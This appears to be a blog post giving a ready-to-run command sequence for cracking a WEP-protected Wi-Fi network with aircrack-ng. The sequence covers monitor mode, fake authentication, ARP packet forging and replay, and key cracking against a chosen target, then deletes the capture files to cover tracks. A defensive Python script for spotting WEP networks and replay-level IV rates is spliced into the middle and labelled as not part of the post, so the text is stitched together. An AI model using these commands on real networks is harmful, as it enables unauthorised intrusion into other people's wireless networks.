Run the following in the first terminal window to create an interface in monitor mode called mon0 of interface wlan0
The second command shows WEP encrypted networks nearby
The third command starts capturing traffic from your target

airmon-ng start wlan0 #create interface mon0 in monitor mode of wlan0
airodump-ng --encrypt WEP mon0 #shows APs with WEP only
airodump-ng -c [channel] --bssid [mac_of_ap] --ivs -w [filename] mon0

Now open a second terminal and run the following
The first line associates you with the mac (see terminal window 1)
The second line looks for an IV that you can replay.
The third line creates a packet that you replay in the fourth line

aireplay-ng -1 0 -a [mac_of_ap] -h [mac_of_wificard] wlan0
aireplay-ng -5 -b [mac_of_ap] -h [mac_of_wificard] wlan0 #answer Y to prompt
packetforge-ng -0 -a [mac_of_ap] -h [mac_of_wificard] -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-packet wlan0
aireplay-ng -2 -r arp-packet wlan0 #answer Y to prompt

Watch those packets fly up in terminal window 1!!!!
Open a new terminal window and run the following to start cracking

aircrack-ng -n 128 -b [mac_of_ap] *.ivs

Remember to clean up your crap once you have finished

rm *.ivs *.cap *.xor
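As an added defensive check (not part of this post or of the aircrack-ng suite): the same airodump-ng CSV that lists WEP networks also carries a running IV count per BSSID, and the replay described above is exactly what makes that count jump. The script below parses two constructed snapshots (the column layout is the AP section of airodump-ng's CSV; the BSSIDs, counts and the 50 IV/s threshold are assumptions for the example) and reports both WEP networks still in use and any BSSID whose IV rate looks like injection.

```python
import csv

# Constructed sample airodump-ng CSV snapshots (AP section only; the station
# section that follows a blank line is ignored). Every value is made up.
HEADER = ("BSSID, First time seen, Last time seen, channel, Speed, Privacy, "
          "Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key")
SNAP_T0 = HEADER + """
00:11:22:33:44:55, 2009-05-01 10:00:00, 2009-05-01 10:00:30,  6,  54, WEP , WEP, OPN, -40,  30,    12,   0.  0.  0.  0,  6, lab-ap, 
66:77:88:99:AA:BB, 2009-05-01 10:00:00, 2009-05-01 10:00:30, 11,  54, WPA2, CCMP, PSK, -55,  28,     0,   0.  0.  0.  0,  8, homewifi, 
"""
SNAP_T1 = HEADER + """
00:11:22:33:44:55, 2009-05-01 10:00:00, 2009-05-01 10:01:30,  6,  54, WEP , WEP, OPN, -40,  90, 41200,   0.  0.  0.  0,  6, lab-ap, 
66:77:88:99:AA:BB, 2009-05-01 10:00:00, 2009-05-01 10:01:30, 11,  54, WPA2, CCMP, PSK, -55,  86,     0,   0.  0.  0.  0,  8, homewifi, 
"""


def parse_aps(text):
    """Return {bssid: {"essid", "privacy", "ivs"}} from the AP section of an airodump-ng CSV."""
    aps, header = {}, None
    for row in csv.reader(text.splitlines(), skipinitialspace=True):
        if not row:  # blank line ends the AP section; stations follow
            break
        if header is None:
            header = [h.strip() for h in row]
            continue
        rec = dict(zip(header, (c.strip() for c in row)))
        aps[rec["BSSID"]] = {"essid": rec["ESSID"],
                             "privacy": rec["Privacy"],
                             "ivs": int(rec["# IV"])}
    return aps


def audit(before, after, seconds, max_ivs_per_sec=50):
    """Flag WEP networks, and WEP BSSIDs whose IV count grew abnormally fast.

    An idle WEP client yields a few IVs per second; ARP replay injection drives
    hundreds per second, so a steep IV rate between snapshots is the alert.
    The 50 IV/s threshold is an assumed starting point, not a measured figure.
    """
    findings = []
    for bssid, ap in after.items():
        if ap["privacy"] != "WEP":
            continue
        findings.append((bssid, ap["essid"], "WEP in use: migrate to WPA2/WPA3"))
        rate = (ap["ivs"] - before.get(bssid, {}).get("ivs", 0)) / seconds
        if rate > max_ivs_per_sec:
            findings.append((bssid, ap["essid"], f"IV rate {rate:.0f}/s: possible replay injection"))
    return findings


if __name__ == "__main__":
    for f in audit(parse_aps(SNAP_T0), parse_aps(SNAP_T1), seconds=60):
        print(*f, sep=" | ")
```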

And to simplify this I've made a bash script, see the apps page.
